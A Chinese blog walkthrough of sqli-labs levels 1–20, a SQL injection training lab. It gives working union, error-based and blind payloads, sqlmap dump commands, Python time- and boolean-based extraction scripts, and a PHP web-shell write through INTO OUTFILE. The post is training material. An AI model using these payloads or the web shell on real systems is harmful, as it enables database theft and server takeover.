日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

sql-labs page1 (1~20)解题过程记录

發布時間:2024/9/30 编程问答 40 豆豆
生活随笔 收集整理的這篇文章主要介紹了 sql-labs page1 (1~20)解题过程记录 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

目錄

Less1:(基于錯誤的GET單引號字符型注入)

less 2:(GET型整型注入)

less 3:(基于錯誤的GET單引號變形字符型注入)

less 4:(基于錯誤的GET雙引號字符型注入)

less 5:?(雙注入GET單引號字符型注入)?

less 6:(雙注入GET雙引號字符型注入)?

less 7:(導出文件GET字符型注入)

less 8:(布爾型單引號GET盲注)

less 9:(基于時間的GET單引號盲注)

less 10:(基于時間的雙引號盲注)

?less 11:?(基于錯誤的POST型單引號字符型注入)

less 12 :(基于錯誤的雙引號POST型字符型變形的注入)

less -13(POST單引號變形雙注入)

less-14 ((POST單引號變形雙注入))

less-15?(基于bool型/時間延遲單引號POST型盲注)

less-16(基于bool型/時間延遲的雙引號POST型盲注)(還有個單括號)

less-17(基于錯誤的更新查詢POST注入)

less -18??(基于錯誤的用戶代理,頭部POST注入)

less-19??(基于頭部的Referer POST報錯注入)

less-20??(基于錯誤的cookie頭部POST注入)

?


Less1:(基于錯誤的GET單引號字符型注入)

解題思路:

方法一,union 聯合查詢注入

1,首先判斷是否存在注入 / ?id=1'? ? ?回顯錯誤,去掉 ' 發現回顯正常,發現是單引號字符型注入

注意此時因為前面報錯可以看到有limit 0,1我們可以知道此處如果需要輸出我們union查詢出的信息要將前面的位占了,即使前面的輸出為不存在。可以看到我是將id的值寫為負值,然后將輸出的位置就讓給了后面我們需要輸出的信息,這個技巧在有輸出限制的時候十分重要。

2,然后用 order by 判斷有幾列數據

/ ?id = 1' order by 3 %23? ?

回顯正常,order by 4 的時候發現回顯錯誤,說明有3 列

我們上面猜測出了字段數為3,但這里輸出的只有2個,所以我們union查詢要保證字段數一樣,不足的補數字(只有mysql可以),或者null。然后第一個是沒有輸出的,所以我將需要輸出的寫在了后面兩個。

3,將id=1改為一個數據庫不存在的id值,如-1,使用union select 1,2,3聯合查詢語句查看頁面是否有顯示位。

發現頁面先輸出了2和3,說明頁面有2個顯示位

4,然后利用sql查詢語句依次爆破出數據庫內的數據庫名,表名,列名,字段信息

(1) 爆數據庫名:

?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata %23

上面的爆出全部的數據庫名,下面的爆當前的數據庫名:

?id=-1' union select 1,2,database() %23

(2) 爆表名:

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() %23

(3)爆字段:

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

(4)爆內容:

?id=-1' union select 1,2,group_concat(username,0x3a,password) from users--+

0x3a 代表十六進制的? ‘ : ’

方法二:手動報錯注入

通過報錯回顯查詢信息

1,爆數據庫名:

?id=1' and extractvalue(1,concat(0x7e,(database()))) --+

2,爆表:

?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+

3,4,直接將 extractvalue(1,concat(0x7e,(……)? )? )? ?內的內容修改即可。或者用 updatexml(1,concat(0x7e,(……),1)

less 2:(GET型整型注入)

1,查看源代碼發現id 直接是整型? ?且沒有 單引號進行閉合

將 id =1 '改為 id =1? ?其他的? 不變? 按照less 1? 的方法進行爆庫

?

less 3:(基于錯誤的GET單引號變形字符型注入)

1,輸入 id=1 正常,輸入id=1'? #? 回顯錯誤 ,根據報錯信息確定咱們輸入的內容存放到一對單引號加圓括號中了,猜想一下咱們輸入1在數據庫語句中的位置,形如select ... from ... where id=(‘1’) ...,在第一題中id=1‘的后面單引號加上),其它保持不變就行了

?

less 4:(基于錯誤的GET雙引號字符型注入)

1,輸入 id =1 回顯正常? ?輸入 id =1' 回顯正常? ?輸入 id = 1"? 回顯錯誤? ? 說明是 雙引號閉合型

輸入 id = 1" %23 回顯錯誤? ?說明還有一個 單括號閉合?

輸入 id = 1")? …… 其他不變

?

less 5:?(雙注入GET單引號字符型注入)?

1,只會顯示個 You are in……? 或者語法錯誤,

輸入 id=1 顯示 You are in……? ? ? 輸入 id = 2334? 無回顯,說明沒有回顯位,無法使用聯合查詢

方法一,使用sqlmap 自動注入:

sqlmap 盲注操作:

檢測

python sqlmap.py -u "URL ? id=1"

爆數據庫名:

python sqlmap.py -u "URL ?id=1" --dbs

爆表名:

python sqlmap.py -u "URL ? id=1" -D dataname --tables

爆字段:

python sqlmap.py -u "URL ? id=1" -D dataname -T table_name --columns

爆內容:

python sqlmap.py -u "URL ? id=1" -D dataname -T table_name -C "id,user,password" --dump

方法二,報錯注入:

?

extractvalue(1,group_concat(0x7E,(……)))報錯:

?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where%20 table_schema = database()))) --+

?

updatexml(1,concat(0x7E,(……)),1)報錯注入:(最多回顯32位 所以需要在payload中加入 limit 限制 來一行一行輸出)(所以不建議使用使用這種報錯)

?id=-1' and updatexml(1,concat(0x7E,(payload limit 0,1)),1)--+

方法三 用floor報錯注入:
輸入:

?

因為floor最多回顯64位字符,所以我們需要放棄group_concat函數,而使用limit 0,1來一個個輸出
group_concat()函數的作用:將返回信息拼接成一行顯示
limit 0,1??表示輸出第一個數據。???0表示輸出的起始位置,1表示跨度為1(即輸出幾個數據,1表示輸出一個,2就表示輸出兩個)

?

COUNT(*)函數返回由SELECT語句返回的結果集中的行數

floor 報錯的具體用法

例如:查詢數據庫版本:(這里需要不斷改變 limit? 來換行)

?id=-1' union select count(*),1, concat('~',(version()),'~', floor(rand()*2)) as a from information_schema.tables group by a--+

爆用戶:

?id=-1' union select count(*),1, concat('~',(select user()),'~', floor(rand()*2)) as a from information_schema.tables group by a--+

爆庫:

?id=-1'union select count(*),count(*), concat('~',(select database()),'~',floor(rand()*2)) as a from information_schema.tables group by a--+

爆表:(這里需要不斷改變 limit? 來換行)

?id=-1' union select count(*),1, concat('~',(select concat(table_name) from information_schema.tables where table_schema=database() limit 1,1),'~',floor(rand()*2)) as a from information_schema.tables group by a--+

爆字段:(這里需要不斷改變 limit? 來換行)

?id=-1' union select count(*),1, concat('~',(select column_name from information_schema.columns where table_name='users' limit 1,1),'~',floor(rand()*2)) as a from information_schema.tables group by a--+

爆內容:(這里需要不斷改變 limit? 來換行)

?id=-1' union select count(*),1, concat('~',(select concat_ws('[',password,username) from users limit 1,1),'~',floor(rand()*2)) as a from information_schema.tables group by a--+

由于只允許輸出一行,所以 用 limit 1,1 ,修改值進行深入查詢

?

方法四:時間延遲型手工注入

時間延遲型手工注入,正確會延遲,錯誤沒有延遲。id無所謂,又不看回顯,可以通過瀏覽器的刷新提示觀察延遲情況,但是id正確的時候的回顯有利于觀察。

1,爆庫長:

?id=1' and if(length(database())=8,sleep(5),1)--+

2,爆庫名:(一個字符一個字符爆)

?id=1' and if(left(database(),1)='s',sleep(5),1)--+

3,爆表名:

?id=1' and if( left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' ,sleep(5),1)--

4,首先嘗試定向爆破,以提高手工注入速度,修改limit x,1 中的x查詢password是否存在表中,lucky的是limit 3,1的時候查到了password列,同樣的方法查詢username

這種方法極其麻煩,不適合使用,僅供參考

可以寫一個基于時延的pyhton腳本 具體參照less9

?

?

?

less 6:(雙注入GET雙引號字符型注入)?

1,只用將less 5 中的單引號改為 雙引號即可

?

less 7:(導出文件GET字符型注入)

1,補充:
@@basedir :mysql安裝路徑

@@datadir :數據庫路徑

load_file(file_name):讀取文件并返回該文件的內容作為一個字符串

使用條件:必須有權限讀取并且文件可讀,必須指定文件完整的路徑

2,由于我不是在本地搭載的環境,所以知道具體的數據存放路徑,需要去獲取絕對路徑,

前面知道 本題是 單引號 加雙括號 的閉合方式:

? id=-1')) union select 1,2,@@datadir --+

獲取不了 路徑

于是去前面的簡單的題找個路徑:

Less-2/?id=-1 union select 1,@@basedir,@@datadir --+

得到路經:

進行文件導入:(這里要用 \\ )

?id=1')) union select 1,2,'<?php @eval($_POST["cmd"]);?>' into outfile "http://43.247.91.228:84\\var\\lib\\mysql\\www\\123.php"--+

需要注意的是:利用數據庫file權限向操作系統寫入文件時,?對于相同文件名的文件不能覆蓋,所以如果第一次上傳chao.php,下次在上傳chao.php,就是無效命令了,也就是新的chao,php中的內容并不會覆蓋,之前的chao.php

然后用菜刀進行連接

?

less 8:(布爾型單引號GET盲注)

1,補充:

(1)盲注分為兩類:
    1.布爾盲注 布爾很明顯Ture跟Fales,也就是說它只會根據 你的注入信息返回Ture跟Fales,也就沒有了之前的報錯信息。
    2.時間盲注 界面返回值只有一種,true 無論輸入任何值 返回情況都會按正常的來處理。加入特定的時間函數,通過查看web頁面返回的時間差來判斷注入的語句是否正確。

(2)

--batch? : 讓sqlmap自動輸入

--dbms mysql? ? ?:指定數據庫系統為mysql繞過sqlmap的自動檢測

-v 顯示 等級(0-6)

方法一 :用sqlmap 按部就班的 來,最后一步的payload 為:

sqlmap.py -u "http://43.247.91.228:84/Less-8/?id=2" --dbms mysql --batch -v 1 --dump -D security -T users -C "id,password,username"

方法二: 用腳本進行 盲注?

具體操作 參考??https://blog.csdn.net/wy_97/article/details/78169623? 的詳細操作

?

less 9:(基于時間的GET單引號盲注)

1,補充:時間盲注 界面返回值只有一種,true 無論輸入任何值 返回情況都會按正常的來處理。加入特定的時間函數,通過查看web頁面返回的時間差來判斷注入的語句是否正確。

2,手工注入實在是太麻煩,將手工注入整理一下寫出一個腳本 讓機器去注入

代碼如下:

import requests value ="abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ@_.-" data="" url = "http://43.247.91.228:84/Less-9/?id=1' and if((ascii(substr(({0} limit 3,1),{1},1)) = '{2}'),sleep(3),NULL); %23" url_length="http://43.247.91.228:84/Less-9/?id=1' and if((length(({0} limit 3,1))={1} ),sleep(3),NULL); %23" def get_length(payload):for n in range(1,100):url= url_length.format(payload,n)print(url)if(get_respone(url)):print("[+] length is {0}".format(n))return n def get_data(payload,value,length):for n in range(1,length):for v in value :url_data = url.format(payload,n,ord(v))print(url_data)if(get_respone(url_data)):global datadata=data+vprint("[+] data is {0}".format(data))break def get_respone(url):try:html = requests.get(url,timeout=2)return Falseexcept Exception as e:print("......")return True databse_payload ="select table_name from information_schema.tables where table_schema = database()" get_data(databse_payload,value,get_length(databse_payload)+1)

這個腳本你每次只能查詢 一個內容,

需要不斷改變? 4,5,行中 limit x,1 的 x 的數字去查詢,

也需要改變? database_payload 去查詢不同的信息

?

less 10:(基于時間的雙引號盲注)

1,只用將第9題中的單引號改為雙引號,其他用腳本注入就好

注意,在腳本的第 4,5中的所有的單引號都改為雙引號

?

?

sqlmap post類型注入方法:

方法一:(“-r? txt ”方式注入)

1,先用burp suite 抓包,保存為1.txt文件放在桌面上

2,打開sqlmap

查詢數據庫名:

python sqlmap.py -r "c:\Users\HP\Desktop\1.txt" -p id --dbs

注:-r表示加載一個文件,-p指定參數

之后對應選擇輸入 : Y? ? ? ?N? ? ? ? ?Y

得到:

之后查表:

python2 sqlmap.py -r "c:\Users\HP\Desktop\1.txt" -p id --D skctf_flag --tables

查字段:

python2 sqlmap.py -r "c:\Users\HP\Desktop\1.txt" -p id --D database_name -T table_name --columns

查內容:

python2 sqlmap.py -r "c:\Users\HP\Desktop\1.txt" -p id --D database_name -T table_name -C column_name --dump

?less 11:?(基于錯誤的POST型單引號字符型注入)

方法一:用 burp suite 攔截后進行聯合查詢 :

方法二: 報錯型 :extractvalue()

一 在burp suite 中加入報錯語句:

查表:

uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() and table_name not in ('emails')))) --+&passwd=admin&submit=Submit# 不加后邊的 and ....只能查詢到前幾個表,加上not in ()就可以查到其他表了

查字段:

uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+&passwd=admin&submit=Submit

查內容: 0x3a 表示十六進制的 “ :”

uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in ('Dumb','I-kill-you'))))--+&passwd=admin&submit=Submit# 加 not in ()

二 直接在表單中直接輸入:(題中的表單輸入的字符有長度限制)

username: admin ' and 1= (報錯語句) # password: admin ' and 1 = (報錯語句) ##試過都有回顯 #報錯語句有很多種 這里用 extractvalue() 例如:extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))或者:usernae: admin'and 1=(updatexml(1,concat(0x3a,(select user())),1))# password: admin'and 1=(updatexml(1,concat(0x3a,(select user())),1))#

方法三:直接用 sqlmap 自動注入:(必須在python 2 環境下)

python2 sqlmap.py -u "http://43.247.91.228:84/Less-11/" --data "uname=11111 &passwd=111111 &submit=Submit" --dbs --threads 10 --batch --method="POST"# --data 后面直接跟數據 # --threads 10 線程數,線程越多注入越快,一般不超過10 # --batch 自動使用默認行為,注入過程中不再詢問 # -- method 指定類型,可以不寫

?

less 12 :(基于錯誤的雙引號POST型字符型變形的注入)

方法一: sqlmap 自動注入:

playload 跟less 11 的一樣

方法二:把單引號單純換成雙引號 測試不行:

查看代碼:

可以看到sql查詢語句:

@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";

構造一個能閉合語句而且會報錯的payload:
?

admin " and 1= (extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))) and "

前閉合,中間查詢,后面報錯,應該是這樣沒錯了,實際測試沒問題

或者:? 從代碼中看到是有一個單括號閉合,那用單括號閉合的報錯語句應該也行!實測也沒問題:

username: "and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) )##前面雙引號閉合,后面接單引號閉合報錯

方法三:用聯合查詢語句: 只不過用 雙引號 和 單括號閉合 : 不再贅述

1") union select 1,database() #

其實也可以構造萬能密碼: admin") #
?

對比less 11和less 12 可以發現:

less 11 (單引號號型注入): 當輸入 a'? ?和 a? 會報錯: 當輸入 a" 或a? ? 和? ?a? 時不會報錯

less 12 (雙引號型注入): 當輸入 a"? ?和 a 會報錯? :當輸入 a'? 或 a? ?和 a 時不會報錯

?

對比兩題? 可以不用看源代碼就能得出 less? 一定是在查詢語句中 加入了 括號,導致需要用 雙引號和括號閉合

@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";

less -13(POST單引號變形雙注入)

and 1= extractvalue(1,concat(0x7e,(database()))) #

and 1=?extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = database()))) #

union select 1,group_concat(table_name) from information_schema.tables where table_schema = database() #

1,輸入admin? 和admin 沒有回顯 , 說明沒有回顯位 ,所以不可以用? 聯合查詢注入,那用 報錯注入

2,輸入 admin'? 和 admin'? 回顯:

可以的得出 是 單引號 +單括號的閉合形式

ok 上報錯注入的payload:
?

// 數據庫名admin') and 1= extractvalue(1,concat(0x7e,(database()))) # // 表名 admin') and 1=?extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = database()))) #

但發現有問題,查詢語句被截斷了,應該是表單有字符長度限制

那就用 burp suit 唄,

?

接著查詢 column? 再進行脫庫,

當然也可以用sqlmap 直接注入,實際沒問題

python2 sqlmap.py -u "http://43.247.91.228:84/Less-13/" --data "uname=11111 &passwd=111111 &submit=Submit" --dbs --threads 10 --batch --method="POST"

當然 用 延時注入和布爾注入也行

?

less-14 ((POST單引號變形雙注入))

1,輸入admin 和admin? ? 還是沒回顯,跟上題一樣? ? admin'? 和 admin'? 也沒回顯

2,輸入admin" 和admin" 有報錯:

發現是 雙引號 閉合的語句

那還用報錯注入,把上題的 閉合方式改一下 成功注入!

less-15?(基于bool型/時間延遲單引號POST型盲注)

1,輸入 admin 和admin 能進入 但沒回顯

2,輸入 admin' 和 admne'? ? ?admin"? ? admin"? 都沒回顯 嗯……

3,輸入 admin' 1=1 #? 能進入,但沒回顯,那只能用 布爾或者延時型注入了:

手工注入是不可能的,一個字符一個字符試恐怕要 弄到猴年馬月了,直接上Python腳本:(兩個腳本經過實測沒有問題)

延時型

//延時型注入import requests import time value ="0123456789abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ%&^@_.-!" result=""def get_length():#獲取數據的長度for n in range(1, 100):payload = "admin' and if((length(({0} limit 1,1))={1}),sleep(4),1) #".format(data_payload, n)data = {"uname": payload, "passwd": "admin", "submit": "submit"}start_time = time.time()html = requests.post(url, data=data)end_time = time.time()use_time = end_time - start_time #求出請求前后的時間差來判斷是否延時了if use_time > 3:print("...... data's length is :"+ str(n))return ndef get_data(length):#獲取數據global resultfor n in range(1,length):for v in value:payload = "admin' and if((ascii(substr(({0} limit 1,1),{1},1)) = '{2}'),sleep(5),1) #".format(data_payload,n,ord(v))data = {"uname":payload,"passwd":"admin","submit":"submit"}start_time = time.time()requests.post(url,data=data)end_time = time.time()use_time = end_time - start_time# 為啥把sleep時間設這么長呢?原因是我這里時常會出現網絡波動,有時候請求時間就有2秒多,為避免出現亂碼,所以設長一點可以保證信息的準確性if use_time >4:result += vprint("......"+result)url = "http://43.247.91.228:84/Less-15/"data_payload ="select database()"length = get_length() + 1 #注意這里要長度加 1 因為 range(1,10)的范圍是 1<= x <10 get_data(length) print(".....data is :"+ result)

布爾型

import requestschars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz_,-.@&%/^!~" result = ""def get_length(value): #獲取要查詢的數據的長度for n in range(1,100):payload = "admin' and length(({0})) ={1} #".format(data_payload,n)data = {"uname":payload,"passwd":"admin"}html = requests.post(url,data=data)length = len(html.text)if length >value:print("……data length is :" + str(n))return ndef get_data(data_length,value): #獲取數據global resultfor i in range(1,data_length):for char in chars:payload = "admin'and ascii(substr(({0}),{1},1))={2} #".format(data_payload,i,ord(char))data = {"uname":payload,"passwd":"admin"}html = requests.post(url,data=data)length = len(html.text)if length>value: #根據返回長度的不同來判斷字符正確與否result += charprint("…… data is :"+ result)breakurl = "http://43.247.91.228:84/Less-15/" data_payload = "select group_concat(table_name)from information_schema.tables where table_schema = database()" value = 1460 # 根據正確訪問和錯誤訪問時返回頁面文本長度的不同 來設置一個判斷值,這個值需要在瀏覽器中 按f12 查看length = get_length(value) +1 get_data(length,value) print(result)

less-16(基于bool型/時間延遲的雙引號POST型盲注)(還有個單括號)

1,輸入 admin 和admin 能進入 但沒回顯

2,輸入 admin' 和 admne'? ? ?admin"? ? admin"? 都沒回顯 嗯……

3,輸入 admin") 1=1 #? 能進入,但沒回顯,那只能用 布爾或者延時型注入了:

把less-15 的腳本改一下就可以用了

?

less-17(基于錯誤的更新查詢POST注入)

1,怎么輸入都不對,嗯……,瞅了眼源碼:

2,原來是對 uname 進行了信息的檢查,寫了那么長的代碼,搞了半天為啥不對passwd 也進行一下 信息過濾呢???

信息過濾函數:

只截取15個字符

get_magic_quotes_gpc()

當magic_quotes_gpc=On的時候,函數get_magic_quotes_gpc()就會返回1

當magic_quotes_gpc=Off的時候,函數get_magic_quotes_gpc()就會返回0

magic_quotes_gpc函數在php中的作用是判斷解析用戶提示的數據,如包括有:post、get、cookie過來的數據增加轉義字符“\”,以確保這些數據不會引起程序,特別是數據庫語句因為特殊字符引起的污染而出現致命的錯誤。

在magic_quotes_gpc = On的情況下,如果輸入的數據有

單引號(’)、雙引號(”)、反斜線(\)與 NULL(NULL 字符)等字符都會被加上反斜線。

stripslashes()刪除由 addslashes() 函數添加的反斜杠

ctype_digit()判斷是不是數字,是數字就返回true,否則返回false

mysql_real_escape_string()轉義 SQL 語句中使用的字符串中的特殊字符。

intval()?????整型轉換

3,輸入 admin? 和? admin' and?1= extractvalue(1,concat(0x7e,(database()))) #

ok? 有報錯的信息回顯

4,那就用burp suit 對passwd 進行報錯注入唄:


?

// 數據庫名admin' and?1= extractvalue(1,concat(0x7e,(database()))) #// 表名 admin' and?1= extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema = database()))) #// column_nameadmin' and?1= extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name = 'users'))) #//脫庫admin' and?1= extractvalue(1,concat(0x7e,(select group_concat(username,0x7e,password)from users ))) #使用concat 和 group_concat 發現有異常 不能先select出同一表中的某些值,再update這個表(在同一語句中)。 也就是說將select出的結果再通過中間表select套一遍,這樣就規避了錯誤,其實之前在子查詢注入中也有用到此方法,同時,還要給多加的一重select賦一個別名admin' and?1= extractvalue(1,concat(0x7e,(select password from (select password from users limit 1,1) test))) #

less -18??(基于錯誤的用戶代理,頭部POST注入)

1,輸入admin 和admin,給了user-agent的相關信息

查看了源代碼:發現對username和password都進行了過濾

而且還把 用戶的 ip? 和 user-agent信息存入了數據庫中

ok 那就用 burp suit? 把 user-agent的信息該為報錯注入的payload

脫庫:

?

less-19??(基于頭部的Referer POST報錯注入)

1,輸入 admin 和admin 會回顯:?Your Referer is:……

2,那將丄題中的 user-agent 注入點 改為? ?referer 注入:

less-20??(基于錯誤的cookie頭部POST注入)

1,輸入admin 和admin :發現是這么個玩意:

瞅一眼源碼,發現有cookie的查詢語句:

果斷選擇cookie下手:

在burp-suit中先用order by 語句測一下有幾行,

Cookie: uname=admin' order by 3--+ //1-3 正常 Cookie: uname=admin' order by 4--+ //4 不正常 ,確定行數為3

然后就正常的查詢,用報錯,可以,不知道為什么我用聯合查詢,查不出來,用報錯可以

?

?

?

?

21~38題在下一篇博客上,正在努力創建,估計在19.8月15號前后完成

?

?

總結

以上是生活随笔為你收集整理的sql-labs page1 (1~20)解题过程记录的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

这里只有精品视频在线 | 国产精品久久99精品毛片三a | 日本高清xxxx| 午夜私人影院 | 九色91在线 | 久久免费视频这里只有精品 | 精品美女在线视频 | 日韩黄色av网站 | 婷婷色网| 日韩手机在线 | 亚洲自拍av在线 | 中文字幕在线观看资源 | 西西www4444大胆在线 | 中文字幕在线日亚洲9 | 中文字幕欧美三区 | 国产精品久久嫩一区二区免费 | 色综合久久88色综合天天免费 | av成人在线观看 | av成人免费在线看 | 日韩在线中文字幕视频 | 99久久日韩精品免费热麻豆美女 | 日本精品久久久久久 | 欧美日比视频 | 91精品视频在线观看免费 | 一区二区三区视频 | 黄色最新网址 | 国产精品永久免费 | 国产五月婷婷 | 成人一级视频在线观看 | 综合久久久久久久久 | 日韩理论片中文字幕 | 国产电影黄色av | 国产福利一区二区三区在线观看 | 色噜噜在线观看 | 99re6热在线精品视频 | 99亚洲精品 | 国产资源在线免费观看 | 色停停五月天 | 香蕉视频在线免费 | 亚洲日本韩国一区二区 | 四虎国产视频 | 久久免费黄色 | 亚洲精品视频在线观看免费视频 | 天天操天天操天天操天天操天天操天天操 | 日韩视频在线一区 | 综合精品在线 | 精品在线观看一区二区 | 黄色小网站在线观看 | 精品一区二区三区久久久 | 毛片一区二区 | 亚洲理论片在线观看 | 又黄又爽又刺激的视频 | 五月婷婷六月丁香 | 久草资源免费 | 香蕉国产91| 久久久国产精品一区二区三区 | 久久久久久久国产精品 | 免费久久99精品国产婷婷六月 | 中文字幕之中文字幕 | 国产精品视频久久 | 日本黄色免费网站 | 中文字幕首页 | 午夜少妇一区二区三区 | 久久精品区| 最新91在线视频 | 一本一本久久a久久精品牛牛影视 | 欧美在线aa | 在线国产日韩 | av免费看电影 | 色之综合网 | 亚洲欧美色婷婷 | 亚洲激情婷婷 | 久久图 | 久热精品国产 | 三级a毛片 | 日本久久久久久久久 | 亚洲激情视频 | 久久精品99国产精品日本 | 成年人免费看的视频 | 玖操| 射久久| 91网址在线看 | 97热视频 | 国产精品中文字幕av | 国产精品久久艹 | 成人一级 | 天天插天天干 | 午夜精品一区二区三区在线观看 | 午夜精品一区二区三区四区 | 色就色,综合激情 | 久久久婷 | 麻豆国产精品一区二区三区 | 婷婷六月久久 | 成人免费观看视频网站 | 国产视频一级 | 国产无区一区二区三麻豆 | 亚洲国产精品成人综合 | 日韩美女一级片 | 丁香六月婷婷激情 | 五月天婷婷狠狠 | 欧美性生活一级片 | 青草草在线 | 国产免费资源 | 毛片永久新网址首页 | 成人在线视频免费看 | 亚洲精品午夜一区人人爽 | 亚洲精欧美一区二区精品 | 久久久久99精品成人片三人毛片 | 精品欧美在线视频 | 亚洲国产日韩一区 | 久久久污 | 久久色视频 | 免费精品 | 亚洲国产精品99久久久久久久久 | www黄色av| 亚洲综合色激情五月 | 日韩av电影中文字幕在线观看 | 天天操天天玩 | 激情视频网页 | 久草.com| 久久亚洲视频 | 一本一本久久aa综合精品 | 天堂麻豆 | 久久er99热精品一区二区三区 | 国产精品福利视频 | 一级黄色a视频 | 欧美精品第一 | 成人四虎影院 | 精品一区二区6 | 一区二区中文字幕在线 | 中文字幕av在线免费 | 久久综合久久八八 | 久久久999免费视频 日韩网站在线 | 久久精品9| 久久久久久高清 | 91丨九色丨国产女 | 亚洲欧洲视频 | bbw av| 麻花传媒mv免费观看 | 亚洲欧美日韩在线看 | 久久毛片高清国产 | 成人黄色在线视频 | 国产精品久久久久av福利动漫 | 国产手机在线播放 | 国产在线国偷精品产拍免费yy | 激情五月伊人 | 国产一区二区网址 | 日韩小视频网站 | 天天艹日日干 | 久久任你操 | 丁香花在线视频观看免费 | 99爱视频| 欧美精品免费视频 | 久久这里只有精品视频99 | 99久久电影| 国产福利一区二区三区在线观看 | 在线观看国产成人av片 | 毛片永久新网址首页 | 久久久久久久久久久免费 | 欧美日韩在线第一页 | 久久综合狠狠综合久久激情 | 日韩一区二区三区免费电影 | av免费观看网站 | 成人黄色大片网站 | 99视频精品免费视频 | 日韩精品久久一区二区三区 | www.夜夜爽| 日b视频在线观看网址 | 国产视频精品网 | 五月开心色 | 玖玖玖国产精品 | 九九久久免费视频 | 中文字幕亚洲不卡 | 日韩电影在线一区二区 | 丝袜美女在线 | 激情五月婷婷丁香 | 国产在线a不卡 | 99久热| 天天操·夜夜操 | 亚洲精品高清一区二区三区四区 | 五月婷婷狠狠 | 婷婷丁香激情综合 | 日本中文字幕在线电影 | 日韩欧美亚州 | 人人插人人舔 | 欧美日韩高清在线 | 黄色成人av在线 | 国产3p视频| 欧美电影黄色 | 亚洲伊人第一页 | 久久久久一区二区三区 | 免费在线中文字幕 | 亚洲精品国偷自产在线91正片 | 91社区国产高清 | 亚洲午夜电影网 | 精品在线免费视频 | 波多野结衣电影一区二区 | 日本精品一区二区在线观看 | 欧美乱熟臀69xxxxxx | 亚洲成a人片在线观看网站口工 | 国产精品热视频 | 91精品久久久久久久91蜜桃 | 伊人国产在线播放 | 久久综合99 | 激情深爱五月 | 99免费精品视频 | 天天做日日爱夜夜爽 | 奇米网在线观看 | 日韩精品观看 | 亚洲黄色小说网址 | 在线观看aa | 99精品视频在线看 | 激情五月婷婷综合网 | 国产精品久久久久一区二区三区共 | 91在线在线观看 | 婷婷中文字幕在线观看 | 五月婷在线播放 | 成年人在线观看免费视频 | 日韩欧美在线一区 | 中文字幕一区二区三区久久 | 欧美日韩国产成人 | 国产精品露脸在线 | 久草视频中文在线 | 国产精品乱码一区二三区 | adn—256中文在线观看 | a黄色片在线观看 | 色综合久久久久综合体桃花网 | 午夜视频福利 | 成人网页在线免费观看 | 97超碰国产精品女人人人爽 | 美女网站一区 | 欧美成人亚洲成人 | 精品国产精品国产偷麻豆 | 国产精品每日更新 | 色先锋av资源中文字幕 | 日韩久久久久久久久久久久 | 亚洲精品国偷拍自产在线观看蜜桃 | 日韩黄色免费看 | 永久免费视频国产 | 中文字幕第一页在线视频 | 九月婷婷人人澡人人添人人爽 | 久久婷婷色 | 国产精品久久久久久久久久久免费 | 久久国产精品一国产精品 | 久草在线视频看看 | 久草资源在线观看 | 日日噜噜噜噜夜夜爽亚洲精品 | 久久国产精品视频 | 91精品国产欧美一区二区 | 亚洲国产999| 中文字幕乱码亚洲精品一区 | 日日干美女 | 欧美日韩免费看 | 伊人影院av | 午夜久久久久久久久久影院 | 亚洲另类久久 | 中国一区二区视频 | 99久久久免费视频 | 丁香婷婷激情网 | 蜜臀久久99精品久久久无需会员 | 亚洲精品视频在线看 | 开心色激情网 | 91在线视频播放 | 久久另类小说 | 96av在线视频 | 日韩黄色免费电影 | 久久精品毛片 | 超碰97国产在线 | 国产精品久久久毛片 | 久久精品欧美 | 国产中文字幕网 | av一区二区三区在线观看 | 欧美少妇bbwhd | 欧美精品久久久久久久 | 99精品国产福利在线观看免费 | 中文字幕国产精品一区二区 | 又黄又爽又刺激视频 | 超碰在线观看av.com | 欧美日韩另类在线观看 | 成人黄色片免费看 | 1024手机基地在线观看 | 国产伦精品一区二区三区四区视频 | 中文在线a在线 | 九九日九九操 | 九九综合在线 | 中文字幕一区二区三区视频 | 国产午夜小视频 | 狠狠做深爱婷婷综合一区 | 国产精品毛片一区二区 | 国产精品女人久久久久久 | 91在线产啪| 中文字幕欧美日韩va免费视频 | 99亚洲国产精品 | 欧美黑人xxxx猛性大交 | 人人爽人人插 | 久久综合射 | 在线 高清 中文字幕 | 日韩精品一区二区三区在线播放 | 国产精品99久久久久 | 国产一区二区在线免费播放 | 国产精品久久久久久久久久久杏吧 | 国产精华国产精品 | 久久久久夜色 | 手机av看片| 欧美一级看片 | 中文在线免费一区三区 | 看污网站| 久草在线视频在线 | 亚洲国产成人久久综合 | 中文国产成人精品久久一 | 久久久久久久久久久久亚洲 | 欧美日韩国产一二三区 | 天堂av官网| 午夜精品久久久久久中宇69 | 国产日本三级 | 